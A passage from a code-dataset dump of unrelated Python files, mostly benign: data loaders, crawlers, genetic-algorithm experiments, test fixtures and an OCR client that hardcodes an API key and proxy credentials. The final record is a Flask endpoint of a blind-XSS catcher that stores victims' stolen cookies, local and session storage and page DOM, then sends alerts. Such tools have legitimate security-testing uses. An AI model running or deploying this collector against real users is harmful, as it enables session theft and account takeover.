line.split()\n word, vector = values[0], np.asarray(values[1:], \"float32\")\n if word in vocabulary:\n embeddings[word] = vector\n return embeddings\n\nif __name__ == \"__main__\":\n load_mnli()","sub_path":"utils/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"323589578","text":"import os\nimport requests\n\nclass cameras:\n def __init__(self,hpwrenUrl):\n self.hpwrenUrl = hpwrenUrl\n self.requestData = requests.get(self.hpwrenUrl)\n self.hpwrenCams = self.requestData.json()\n\n def getImageURL(self, cameraID=0,siteID=0):\n hpwrenCams = self.hpwrenCams\n hpwrenCamsF = hpwrenCams[\"features\"]\n hpwrenCamsAtSite = hpwrenCamsF[siteID][\"properties\"][\"latest-images\"]\n imageURL = hpwrenCamsAtSite[cameraID][0][\"image\"]\n description = hpwrenCamsAtSite[cameraID][0][\"description\"]\n return imageURL,description\n","sub_path":"plugin-smokedetect/src/hpwren.py","file_name":"hpwren.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"266784715","text":"import argparse\nimport os\nfrom wdata_config.loggers import create_info_log as create_info_log\n\n\nlogger = create_info_log(__name__)\n\n\n# function to handle direct call from terminal with argparse\ndef parsing_to_api():\n directory = os.getcwd()\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--task', '-t',\n help='options: category data with -d category, or videos data with -v videos',\n type=str,\n nargs=1,\n default='trends'\n )\n parser.add_argument(\n '--category', '-ct',\n help='category which the API will bring data. Ex: -c 3',\n type=int,\n nargs=1,\n default=0\n )\n parser.add_argument(\n '--country', '-c',\n help=\"the ISO 3166-1 Alpha 2 country code which the API will bring data. Ex: BR\",\n type=str,\n nargs=1,\n default=\"BR\"\n )\n parser.add_argument(\n '--output_dir', '-o',\n help='Path to save the outputted files in',\n type=str,\n nargs=1,\n default=f'{directory}\\a_data_processing\\output\\YouTube'\n )\n parser.add_argument(\n '--name', '-n',\n help='optional file name which the data will be written',\n type=str,\n nargs=1,\n default='standard'\n )\n parser.add_argument(\n '--routine', '-r',\n help='basically, use to mark if the call is a routine programmed',\n type=str,\n nargs=1,\n default='No'\n )\n args = parser.parse_args()\n \n # the reason to parse argparse as keywords it's because not always this API will be called from terminal\n \n return{\n \"task\": args.task,\n \"category\": args.category,\n \"country\": args.country,\n \"name\": args.name,\n \"output\":f'{directory}/a_data_processing/output/YouTube',\n \"routine\":args.routine\n }\n\n \n# this here is for when WData is called first from terminal\ndef construct():\n directory = os.getcwd()\n logger.info(\"Starting YouTube API construct\")\n print(\"Follow these instructions to use YouTube API\")\n \n print(\"Which task will the API use? Choose a character:\")\n print(\"[t] - trends videos information\")\n print(\"[c] - categories' list information\")\n task = input()\n\n print(\"Which country the data will be Fetch? Use ISO 3166-1 Alpha 2 code\")\n country = input()\n\n if task == \"t\":\n task = \"trends\"\n print(\"Which category of videos will the API fetch? Choose a number:\")\n print(\"\\t [0] - All\\n\"\n \"\\t [10] - Music \\n\"\n \"\\t [20] - Gaming \\n\"\n \"\\t [25] - News & Politics\")\n category = int(input())\n logger.info(f\"Starting process on {task}, category {category} for country {country}\")\n \n return{\n \"task\": task,\n \"category\": category,\n \"country\": country,\n \"name\": \"standard\",\n \"output\":f'{directory}/a_data_processing/output/YouTube',\n \"routine\":'No'\n }\n else:\n task = \"categories\"\n \n return{\n \"task\": task,\n \"country\": country,\n \"name\": \"standard\",\n \"output\":f'{directory}/a_data_processing/output/YouTube',\n \"routine\":'No'\n }","sub_path":"a_data_processing/YouTube/config/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"116915944","text":"import asyncio\nimport os\nimport shutil\nfrom unittest import mock\n\nimport pytest\nfrom aiohttp.test_utils import TestClient\nfrom aiohttp.web import Application\nfrom sqlalchemy.engine.url import URL\nfrom sqlalchemy_utils import create_database, database_exists\n\nfrom openapi.db.dbmodel import CrudDB\nfrom openapi.testing import app_cli, with_test_db\n\nfrom .example.db import DB\nfrom .example.main import create_app\n\n\n@pytest.fixture(scope=\"session\")\ndef sync_url() -> URL:\n return DB.sync_engine.url\n\n\n@pytest.fixture(autouse=True)\ndef clean_migrations():\n if os.path.isdir(\"migrations\"):\n shutil.rmtree(\"migrations\")\n\n\n@pytest.fixture(autouse=True)\ndef sentry_mock(mocker):\n mm = mock.MagicMock()\n mocker.patch(\"sentry_sdk.init\", mm)\n return mm\n\n\n@pytest.fixture(scope=\"module\", autouse=True)\ndef event_loop():\n \"\"\"Return an instance of the event loop.\"\"\"\n loop = asyncio.new_event_loop()\n try:\n yield loop\n finally:\n loop.close()\n\n\n@pytest.fixture(scope=\"session\")\ndef clear_db(sync_url: URL) -> CrudDB:\n if not database_exists(sync_url):\n # drop_database(url)\n create_database(sync_url)\n else:\n DB.drop_all_schemas()\n return DB\n\n\n@pytest.fixture\nasync def cli(clear_db: CrudDB) -> TestClient:\n app = create_app().web()\n with with_test_db(app[\"db\"]):\n async with app_cli(app) as cli:\n yield cli\n\n\n@pytest.fixture(scope=\"module\")\nasync def cli2(clear_db: CrudDB) -> TestClient:\n app = create_app().web()\n with with_test_db(app[\"db\"]):\n async with app_cli(app) as cli:\n yield cli\n\n\n@pytest.fixture\ndef test_app(cli: TestClient) -> Application:\n return cli.app\n\n\n@pytest.fixture\ndef db(test_app: Application) -> CrudDB:\n return test_app[\"db\"]\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"411650928","text":"import networkx as nx\nfrom networkx.readwrite import json_graph\nimport json\nfrom collections import defaultdict, deque\nfrom heapq import heappush, heappop\nfrom itertools import count\nimport threading\nfrom multiprocessing.dummy import Pool as ThreadPool\n\n\n\ndef own_DFS(graph, s, dest=0, paths=False):\n visited = set()\n\n def dfs(G, source=None):\n if source is None:\n nodes = G\n else:\n nodes = [source]\n for start in nodes:\n if start in visited:\n continue\n visited.add(start)\n stack = [(start, iter(G[start]))]\n while stack:\n parent, children = stack[-1]\n try:\n child = next(children)\n if child not in visited:\n yield parent, child\n visited.add(child)\n stack.append((child, iter(G[child])))\n except StopIteration:\n stack.pop()\n\n path = []\n edges = list(nx.dfs_edges(graph, s))\n edges.reverse()\n for x in edges:\n if x[1] == dest:\n path.append(dest)\n dest = x[0]\n path.append(s)\n path.reverse()\n return path if paths else dfs(graph, s)","sub_path":"AIProject/Alg2/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"32952925","text":"import numpy as np\r\nimport pandas as pd\r\nimport MARS # MARS (Multivariate Adaptive Regression Splines) regression class\r\nimport WindFarmGeneticToolbox # wind farm layout optimization using genetic algorithms classes\r\nfrom datetime import datetime\r\nimport os\r\nimport pickle\r\n\r\n# parameters for the genetic algorithm\r\nelite_rate = 0.2\r\ncross_rate = 0.6\r\nrandom_rate = 0.5\r\nmutate_rate = 0.1\r\n\r\n# wind farm size, cells\r\nrows = 21\r\ncols = 21\r\ncell_width = 77.0 * 2 # unit : m\r\n\r\n#\r\nN = 60 # number of wind turbines\r\npop_size = 100 # population size, number of inidividuals in a population\r\niteration = 3 # number of genetic algorithm iterations\r\n\r\n# all data will be save in data folder\r\ndata_folder = \"data\"\r\nif not os.path.exists(data_folder):\r\n os.makedirs(data_folder)\r\n\r\n# create an object of WindFarmGenetic\r\nwfg = WindFarmGeneticToolbox.WindFarmGenetic(rows=rows, cols=cols, N=N, pop_size=pop_size,\r\n iteration=iteration, cell_width=cell_width, elite_rate=elite_rate,\r\n cross_rate=cross_rate, random_rate=random_rate, mutate_rate=mutate_rate)\r\n# set wind distribution\r\n# wind distribution is discrete (number of wind speeds) by (number of wind directions)\r\n# wfg.init_4_direction_1_speed_12()\r\nwfg.init_1_direction_1_N_speed_12()\r\n\r\n################################################\r\n# generate initial populations\r\n################################################\r\n\r\ninit_pops_data_folder = \"data/init_pops\"\r\nif not os.path.exists(init_pops_data_folder):\r\n os.makedirs(init_pops_data_folder)\r\n# n_init_pops : number of initial populations\r\nn_init_pops = 60\r\nfor i in range(n_init_pops):\r\n wfg.gen_init_pop()\r\n wfg.save_init_pop(\"{}/init_{}.dat\".format(init_pops_data_folder,i))\r\n\r\n\r\n#############################################\r\n# generate wind distribution surface\r\n#############################################\r\nwds_data_folder = \"data/wds\"\r\nif not os.path.exists(wds_data_folder):\r\n os.makedirs(wds_data_folder)\r\n# mc : monte-carlo\r\nn_mc_samples = 10000\r\n\r\n# each layout is binary list and the length of the list is (rows*cols)\r\n# 1 indicates there is a wind turbine in that cell\r\n# 0 indicates there is no wind turbine in the cell\r\n# in \"mc_layout.dat\", there are 'n_mc_samples' line and each line is a layout.\r\n\r\n# generate 'n_mc_samples' layouts and save it in 'mc_layout.data' file\r\nWindFarmGeneticToolbox.LayoutGridMCGenerator.gen_mc_grid(rows=rows, cols=cols, n=n_mc_samples, N=N,\r\n lofname=\"{}/{}\".format(wds_data_folder, \"mc_layout.dat\"))\r\n# read layouts from 'mc_layout.dat' file\r\nlayouts = np.genfromtxt(\"{}/{}\".format(wds_data_folder,\"mc_layout.dat\"), delimiter=\" \", dtype=np.int32)\r\n\r\n# generate dataset to build wind farm distribution surface\r\nwfg.mc_gen_xy(rows=rows, cols=cols, layouts=layouts, n=n_mc_samples, N=N, xfname=\"{}/{}\".format(wds_data_folder, \"x.dat\"),\r\n yfname=\"{}/{}\".format(wds_data_folder, \"y.dat\"))\r\n\r\n# parameters for MARS regression method\r\nn_variables = 2\r\nn_points = rows * cols\r\nn_candidate_knots = [rows, cols]\r\nn_max_basis_functions = 100\r\nn_max_interactions = 4\r\ndifference = 1.0e-3\r\n\r\nx_original = pd.read_csv(\"{}/{}\".format(wds_data_folder,\"x.dat\"), header=None, nrows=n_points, delim_whitespace=True)\r\nx_original = x_original.values\r\n\r\ny_original = pd.read_csv(\"{}/{}\".format(wds_data_folder,\"y.dat\"), header=None, nrows=n_points, delim_whitespace=True)\r\ny_original = y_original.values\r\n\r\nmars = MARS.MARS(n_variables=n_variables, n_points=n_points, x=x_original, y=y_original,\r\n n_candidate_knots=n_candidate_knots, n_max_basis_functions=n_max_basis_functions,\r\n n_max_interactions=n_max_interactions, difference=difference)\r\nmars.MARS_regress()\r\n# save wind distribution model to 'wds.mars'\r\nmars.save_mars_model_to_file()\r\nwith open(\"{}/{}\".format(wds_data_folder,\"wds.mars\"), \"wb\") as mars_file:\r\n pickle.dump(mars, mars_file)\r\n\r\n\r\n\r\n# results folder\r\n# adaptive_best_layouts_N60_9_20190422213718.dat : best layout for AGA of run index 9\r\n# result_CGA_20190422213715.dat : run time and best eta for CGA method\r\nresults_data_folder = \"data/results\"\r\nif not os.path.exists(results_data_folder):\r\n os.makedirs(results_data_folder)\r\n\r\nn_run_times = 3 # number of run times\r\n# result_arr stores the best conversion efficiency of each run\r\nresult_arr = np.zeros((n_run_times, 2), dtype=np.float32)\r\n\r\n# CGA method\r\nCGA_results_data_folder = \"{}/CGA\".format(results_data_folder)\r\nif not os.path.exists(CGA_results_data_folder):\r\n os.makedirs(CGA_results_data_folder)\r\nfor i in range(0, n_run_times): # run times\r\n print(\"run times {} ...\".format(i))\r\n wfg.load_init_pop(\"{}/init_{}.dat\".format(init_pops_data_folder, i))\r\n run_time, eta = wfg.conventional_genetic_alg(ind_time=i, result_folder=CGA_results_data_folder)\r\n result_arr[i, 0] = run_time\r\n result_arr[i, 1] = eta\r\ntime_stamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\nfilename = \"{}/result_CGA_{}.dat\".format(CGA_results_data_folder, time_stamp)\r\nnp.savetxt(filename, result_arr, fmt='%f', delimiter=\" \")\r\n\r\n# AGA method\r\nAGA_results_data_folder = \"{}/AGA\".format(results_data_folder)\r\nif not os.path.exists(AGA_results_data_folder):\r\n os.makedirs(AGA_results_data_folder)\r\nfor i in range(0, n_run_times): # run times\r\n print(\"run times {} ...\".format(i))\r\n wfg.load_init_pop(\"{}/init_{}.dat\".format(init_pops_data_folder, i))\r\n run_time, eta = wfg.adaptive_genetic_alg(ind_time=i, result_folder=AGA_results_data_folder)\r\n result_arr[i, 0] = run_time\r\n result_arr[i, 1] = eta\r\ntime_stamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\nfilename = \"{}/result_AGA_{}.dat\".format(AGA_results_data_folder, time_stamp)\r\nnp.savetxt(filename, result_arr, fmt='%f', delimiter=\" \")\r\n\r\n# SIGA method\r\nSIGA_results_data_folder = \"{}/SIGA\".format(results_data_folder)\r\nif not os.path.exists(SIGA_results_data_folder):\r\n os.makedirs(SIGA_results_data_folder)\r\n# wds_mars_file : wind distribution surface MARS model file\r\nwds_mars_file = \"{}/{}\".format(wds_data_folder, \"wds.mars\")\r\nfor i in range(0, n_run_times): # run times\r\n print(\"run times {} ...\".format(i))\r\n wfg.load_init_pop(\"{}/init_{}.dat\".format(init_pops_data_folder, i))\r\n run_time, eta = wfg.self_informed_genetic_alg(ind_time=i, result_folder=SIGA_results_data_folder,\r\n wds_file=wds_mars_file)\r\n result_arr[i, 0] = run_time\r\n result_arr[i, 1] = eta\r\ntime_stamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\nfilename = \"{}/result_self_informed_{}.dat\".format(SIGA_results_data_folder, time_stamp)\r\nnp.savetxt(filename, result_arr, fmt='%f', delimiter=\" \")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"552393209","text":"from scripts.heston_mc import calculate_heston_mc_price\nfrom scripts.get_answer_for_prices import make_premialike_answers, read_paramset\nimport os\n\ndef make_price_to_mc_comparison(file_with_prices_and_parameters):\n paramset = read_paramset(file_with_prices_and_parameters)\n if not paramset.keys():\n print(\"cannot obtain parameters from the input file. Are there any? name = \" + file_with_prices_and_parameters)\n else:\n mc_prices = []\n source_file = open(file_with_prices_and_parameters, 'r')\n for line in source_file:\n if line[0].isdigit():\n s0 = float(line.split(',')[0])\n heston_mc_price = calculate_heston_mc_price(paramset['T'], s0, paramset['H'], paramset['K'],\n paramset['r_premia'],\n paramset['V0'], paramset['kappa'], paramset['theta'],\n paramset['sigma'], paramset['rho'])\n mc_prices.append(heston_mc_price)\n source_file.close()\n return mc_prices\n\n\ndef create_price_to_mc_comparison_file(file_with_prices_and_parameters):\n source_file_name = file_with_prices_and_parameters\n source_file = open(file_with_prices_and_parameters, 'r')\n # changing filename and directory\n dest_file_name = source_file_name.replace(\".csv\", \"_mc.csv\")\n dest_file_name = source_file_name.replace(dest_file_name.split('/')[-2], \"experiment_premia_vs_mc\")\n dest_file = open(dest_file_name, 'w')\n\n mc_prices = make_price_to_mc_comparison(file_with_prices_and_parameters)\n\n i = 0\n for line in source_file:\n if not line[0].isdigit():\n dest_file.write(line)\n else:\n line_with_mc = line.split(\"\\n\")[0] + \",\" + str(mc_prices[i]) + \"\\n\"\n dest_file.write(line_with_mc)\n i += 1\n\n\ndef make_price_to_mc_comparison_for_folder(experiment_folder):\n for source_file_name in os.listdir(experiment_folder):\n resulting_source_filename = experiment_folder + source_file_name\n if resulting_source_filename.endswith(\".csv\"):\n try:\n create_price_to_mc_comparison_file(resulting_source_filename)\n except:\n print(\"cannot make monte-carlo approximation for\" + resulting_source_filename)\n\nif __name__ == '__main__':\n# make_price_to_mc_comparison_for_folder(\"../output/experiment_premia_prices/\")\n make_price_to_mc_comparison(\"/home/basil/PycharmProjects/Project_Wiener_Hopf_OP/output/experiment/\"\n \"T=1H=90K=100.0r=10V0=0.01kappa=2.0theta=0.01sigma=0.2rho=0.5N=100M=512L=1.5.csv\")\n","sub_path":"LICENSE.md/scripts/method_to_mc_comparison.py","file_name":"method_to_mc_comparison.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"342711629","text":"#!/usr/bin/env python3\n\nfrom src import likely_model_generator\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('config_path', type=str, help='configuration file path')\n parser.add_argument('-p', '--preprocess', help='Preprocess the traces', action=\"store_true\")\n parser.add_argument('-u', '--update', help='Update Preprocessed data', action=\"store_true\")\n parser.add_argument('-c', '--create', help='Create Likely Model', action=\"store_true\")\n\n args = parser.parse_args()\n\n likely_model_generator.run(args)\n","sub_path":"LikelyModelGenerator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"371374252","text":"# coding=utf-8\nimport sys\nimport logging\n\nfrom model.home import HomePageAmericanas, HomePage, HomePageExtra, HomePageNetshoes\nfrom model.product import AmericanasProduct, NetshoesProduct\nfrom helper.crawler import Crawler\n\n\n\ndef getClass(name, module_path=\"model.home\"):\n\n try:\n module = __import__(module_path, fromlist=[name])\n except ImportError:\n raise ValueError(\"Module %s could not be imported\" % (module_path))\n\n try:\n cls_ = getattr(module, name)\n except AttributeError:\n raise ValueError(\"Module %s has no class %s\" % (module_path, class_name))\n\n return cls_\n\nclass SitemapReader():\n\n sitemap = []\n site = None\n\n def __init__(self, sitemaps):\n self.sitemaps = sitemaps\n self.crawler = Crawler()\n\n def run(self):\n full_homepage = {'product' : [], 'homepage': []}\n total_inserted = 0\n for sitemap_key in self.sitemaps:\n total_inserted_aux = 0\n url = self.sitemaps[sitemap_key]\n sitemap_content = self.get_sitemap_content(url)\n content_dict = self.read_sitemap(sitemap_content, sitemap_key)\n total_inserted_aux = self.save_sitemap_content(content_dict)\n total_inserted += total_inserted_aux\n return total_inserted\n\n def save_sitemap_content(self, content_dict):\n total_inserted = 0\n\n for key, content_list in content_dict.iteritems():\n total_inserted_aux = 0\n if content_list:\n content_list = set(content_list)\n content_list = list(content_list)\n if key == 'homepage':\n total_inserted_aux = len(HomePage.add_homes(content_list))\n else:\n total_inserted_aux = len(NetshoesProduct.objects.insert(content_list))\n total_inserted += total_inserted_aux\n logging.debug(\"Foram inseridos %d de %s\", total_inserted, HomePage.__name__)\n return total_inserted\n\n\n def read_sitemap(self, localizacoes, sitemap_key):\n homepage_list = []\n product_list = []\n content_sitemap = {'product': product_list, 'homepage': homepage_list}\n for local in localizacoes:\n url = local.firstChild.nodeValue\n if \"xml\" in url:\n content_sitemap_aux = self.read_sitemap(self.get_sitemap_content(url), sitemap_key)\n content_sitemap['product'] = content_sitemap['product'] + content_sitemap_aux['product']\n content_sitemap['homepage'] = content_sitemap['homepage'] + content_sitemap_aux['homepage']\n elif \"/produto/\" in url:\n # apenas a Netshoes tem paginas de produto dentro do sitemap\n product = NetshoesProduct(url=url, site=sitemap_key)\n complete_product = product.parse()\n product_list.append(complete_product)\n else:\n home_page_class = getClass(name=\"HomePage\"+sitemap_key)\n homepage = home_page_class(url=url, priority=10, site=sitemap_key)\n homepage_list.append(homepage)\n return content_sitemap\n\n def get_sitemap_content(self, url):\n xmldoc = self.crawler.crawl_XML(url)\n urls = self.crawler.get_XML_info(xmldoc, 'loc')\n return urls\n\n\nclass HomePageReader(object):\n\n def read_content(self, homepage_class_name):\n product_list = []\n i = 0\n total_inserido = 0\n total_lido = 0\n for home in homepage_class_name.objects(priority__lte=5):\n product_list.extend(home.parse())\n i+=1\n #por ser uma máquina pequena estamos inserindo aos poucos\n if len(product_list) > 5000:\n total_lido += len(product_list)\n new_products_set = set(product_list)\n new_products_list = list(new_products_set)\n total_inserido += homepage_class_name.add_products(new_products_list)\n logging.debug(\"Insercao partial de produtos, porque a maquina só tem 1GB\")\n product_list = []\n\n logging.debug(\"Total parcial: %d homes lidas e %d produtos\", i, (total_lido + len(product_list)))\n\n new_products_set = set(product_list)\n new_products_list = list(new_products_set)\n total_inserido += homepage_class_name.add_products(new_products_list)\n\n logging.debug(\"Foram lidos %d e inseridos\", total_lido, total_inserido)\n return\n\nclass ProductReader(object):\n\n def update_products(self, product_type):\n product = product_type()\n product.update_products()\n\ndef setup_log(arguments):\n\n try: # Python 2.7+\n from logging import NullHandler\n except ImportError:\n class NullHandler(logging.Handler):\n def emit(self, record):\n pass\n\n logging.getLogger(__name__).addHandler(NullHandler())\n logging.basicConfig(filename=arguments[1]+\"-\"+arguments[2]+\".log\",level=logging.DEBUG)\n\n\nif __name__ == '__main__':\n\n setup_log(sys.argv)\n\n sites = {\"Americanas\":\"http://www.americanas.com.br/sitemap_index_acom.xml\",\n \"Extra\":\"http://buscando.extra.com.br/sitemap.xml\",\n \"Netshoes\": \"http://www.netshoes.com.br/sitemap.xml\",\n \"Submarino\": \"http://www.submarino.com.br/sitemap_index_suba.xml\" }\n if sys.argv and sys.argv[1] == 'sitemap-read':\n #gera as homepages a partir dos sitemaps\n sitemap = sites[sys.argv[2]]\n logging.debug(\"Opcao de leitura do sitemap, iniciando geracao das homes de produto do site %s\", sitemap)\n x = SitemapReader({sys.argv[2]: sitemap})\n total_inserted = x.run()\n logging.debug(\"Foram lidas %d paginas, que podem ser homes e pagina de produtos\", total_inserted)\n\n elif sys.argv and sys.argv[1] == 'product-read':\n logging.debug(\"Inicia o processo de leitura das homes %s para gerar as paginas e produto\", sys.argv[2])\n\n cls_ = getClass(name=\"HomePage\"+sys.argv[2])\n home_page_reader = HomePageReader()\n home_page_reader.read_content(cls_)\n\n elif sys.argv and sys.argv[1] == 'product-update':\n logging.debug(\"Inicia o processo de leitura de updade dos produtos %s\", sys.argv[2])\n\n cls_ = getClass(name=sys.argv[2]+\"Product\", module_path=\"model.product\")\n product_reader = ProductReader()\n product_reader.update_products(cls_)\n","sub_path":"scrapper/sitemap.py","file_name":"sitemap.py","file_ext":"py","file_size_in_byte":6415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"508375947","text":"import sys\nimport os\nimport binascii\nfrom typing import Optional\n\nfrom Crypto.Hash import SHA256\n\n\ndef sha256sum_file(filename: str, chunk_sz=512) -> Optional[bytes]:\n # Checks + open file\n if not os.path.exists(filename):\n return None\n # sha256 ctx init\n sha256_ctx = SHA256.new()\n # read file + update sha256 ctx\n with open(filename, 'rb') as f_in:\n data = f_in.read(chunk_sz)\n while len(data) > 0:\n sha256_ctx.update(data)\n data = f_in.read(chunk_sz)\n return sha256_ctx.digest()\n\n \n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(f'usage: {sys.argv[0]} ')\n sys.exit(1)\n # else:\n digest = sha256sum_file(sys.argv[1])\n if digest is not None:\n print(f'{binascii.hexlify(digest).decode()}')\n else:\n print(f'error')\n sys.exit(0)\n","sub_path":"misc/sha256sum.py","file_name":"sha256sum.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"184944057","text":"#!/usr/bin/python3\n\n# Imports\nimport base64\nimport json\nimport requests\nimport os\n# ワイルドカードを利用\nfrom glob import glob\n\nTEGAKI_FORM_ENDPOINT = 'https://api.tegaki.ai/hwr/v1/form'\nMY_API_KEY = '3bfeec98-8832-4f05-8477-7f8309f7b914'\nPROXIES = {\n 'http': 'http://Takeshi_Umezaki:umezaki6@192.168.236.23:8080',\n 'https': 'https://Takeshi_Umezaki:umezaki6@192.168.236.23:8080',\n }\nFORM_JSON_FILE_NAME = \"karisinsa.json\"\nIMAGE_DIR = \"C:\\\\Users\\\\Takeshi_Umezaki\\\\Documents\\\\ocr\\\\demo\\\\forapi\\\\\"\n# wild card\n# FILES = \"MpfRcvImgTFS00000244_0001*.jpg\"\nFILES = \"*.jpg\"\n\n_json_str = \"\"\n_request_id = \"\"\n_file_name = \"\"\n\n \n# base64-encoding files\n\n\ndef encode_image(image):\n image_content = image.read()\n encoded_byte = base64.b64encode(image_content)\n encoded_str = encoded_byte.decode(\"UTF-8\")\n return encoded_str\n\n# Post request for a single form to Tegaki service\n\n\ndef post_form(template_json_file, form_image_file):\n # Read json file\n template_json_data = json.loads(template_json_file)\n\n # Inject the base64-encoded form image into the template json\n template_json_data['imageData'] = encode_image(form_image_file)\n\n # Send POST request to Tegaki service\n response = requests.post(TEGAKI_FORM_ENDPOINT,\n headers={'Authorization': 'apikey ' + MY_API_KEY},\n json=template_json_data, proxies=PROXIES)\n\n # Print the result\n print(response.status_code)\n print(response.json())\n dict_res_json = response.json()\n _request_id = dict_res_json['requestId']\n print(_file_name, _request_id)\n\n file_results = open(\"results.txt\", \"a\", encoding=\"shift_jis\")\n file_results.write(_file_name + \",\" + _request_id + \"\\n\")\n file_results.close()\n\n\nif __name__ == '__main__':\n print(\"start\")\n os.chdir(IMAGE_DIR)\n\n with open(FORM_JSON_FILE_NAME, 'r', encoding=\"utf-8\") as json_file:\n _json_str = str(json_file.read())\n\n print(len(_json_str))\n files = glob(FILES)\n for file_name in files:\n _file_name = file_name\n print(_file_name)\n image_file = open(_file_name, \"rb\")\n\n post_form(_json_str, image_file)\n\n","sub_path":"tegaki_req.py","file_name":"tegaki_req.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"171164562","text":"import urllib.parse\nimport json\nimport urllib.request\nimport urllib\n\n\nBASE_URL='http://open.mapquestapi.com/directions/v2/route?'\nMAP_KEY='Fmjtd%7Cluu821682u%2Caw%3Do5-942n0a'\n#MAP_KEY='Fmjtd%7Cluu82q01nl%2Cbl%3Do5-94ya1f'\nELE_URL='http://open.mapquestapi.com/elevation/v1/profile?'\n\n\ndef build_multiple_url(addresses:list,location_start:str)->str:\n '''\n Build the URL necessary to generate the json which will be used\n later to retrieve commands.\n\n This function is written in a way where x>2 number of locations can be handled \n '''\n query_parameters=[('key',MAP_KEY),('ambiguities','ignore'),('from',location_start)]\n for x in addresses:\n query_parameters.append(('to',x))\n return BASE_URL+urllib.parse.urlencode(query_parameters)\n\n\ndef build_elevation(elevations:list)->str:\n query_parameters=[('key',MAP_KEY),('unit','f'),('latLngCollection',','.join(str(lng) for lng in elevations))]\n return ELE_URL+urllib.parse.urlencode(query_parameters)\n \n\ndef get_json_result(url:str)->'json':\n '''\n Opens the url returned from the method above and reads the contents\n and returns the json which will be used to process the commands provided\n '''\n response = None\n #url=urllib.parse.unquote(url)\n try:\n response=urllib.request.urlopen(url)\n return json.loads(response.read().decode(encoding='utf-8'))\n finally:\n if response != None:\n response.close()\n\n\n\n\n \n\n\n \n","sub_path":"Lab 3/QueryBuilding.py","file_name":"QueryBuilding.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402480003","text":"import json\nimport time\n\nfrom app import db\nfrom app.api import bp\nfrom app.models import XSS, Client, Settings\nfrom app.utils import send_mail, send_webhook\nfrom flask import jsonify, request\nfrom flask_cors import cross_origin\n\n\n@bp.route(\"/x//\", methods=[\"GET\", \"POST\"])\n@cross_origin()\ndef catch_xss(flavor, uid):\n \"\"\"Catches an XSS\"\"\"\n client = Client.query.filter_by(uid=uid).first()\n parameters = None\n\n if client == None:\n return jsonify({\"status\": \"OK\"}), 200\n\n if flavor == \"r\":\n xss_type = \"reflected\"\n else:\n xss_type = \"stored\"\n if \"X-Forwarded-For\" in request.headers:\n ip_addr = request.headers[\"X-Forwarded-For\"].split(\", \")[0]\n else:\n ip_addr = request.remote_addr\n\n if request.method == \"GET\":\n parameters = request.args.to_dict()\n elif request.method == \"POST\":\n if request.is_json:\n parameters = request.get_json()\n else:\n parameters = request.form\n\n headers = {}\n tags = []\n for header in request.headers:\n headers.update({header[0]: header[1]})\n\n data = {}\n\n for param, value in parameters.items():\n\n if param == \"cookies\":\n if value != \"\":\n if \"cookies\" not in data.keys():\n data[\"cookies\"] = {}\n cookies_list = value.split(\"; \")\n for cookie in cookies_list:\n cookie_array = cookie.split(\"=\")\n cookie_name = cookie_array[0]\n cookie_value = \"\".join(cookie_array[1:])\n data[\"cookies\"].update({cookie_name: cookie_value})\n\n elif param == \"local_storage\":\n if value != \"\" and value != \"{}\":\n if \"local_storage\" not in data.keys():\n data[\"local_storage\"] = {}\n local_storage = json.loads(value)\n for element_name, element_value in local_storage.items():\n data[\"local_storage\"].update({element_name: element_value})\n\n elif param == \"session_storage\":\n if value != \"\" and value != \"{}\":\n if \"session_storage\" not in data.keys():\n data[\"session_storage\"] = {}\n session_storage = json.loads(value)\n for element_name, element_value in session_storage.items():\n data[\"session_storage\"].update({element_name: element_value})\n else:\n if value != \"\" and value != \"{}\":\n if param == \"dom\":\n data[\"dom\"] = \"\\n{}\\n\".format(value)\n elif param == \"tags\":\n tags = value.split(\",\")\n else:\n data[param] = value\n\n xss = XSS(\n headers=json.dumps(headers),\n ip_addr=ip_addr,\n client_id=client.id,\n xss_type=xss_type,\n data=json.dumps(data),\n timestamp=int(time.time()),\n tags=json.dumps(tags),\n )\n db.session.add(xss)\n db.session.commit()\n\n settings = Settings.query.first()\n\n if (xss.client.mail_to != None or settings.mail_to != None) and settings.smtp_host != None:\n try:\n send_mail(xss=xss)\n settings.smtp_status = True\n db.session.commit()\n except:\n settings.smtp_status = False\n db.session.commit()\n\n if settings.webhook_url != None or xss.client.webhook_url != None:\n try:\n send_webhook(xss=xss)\n except:\n pass\n\n return jsonify({\"status\": \"OK\"}), 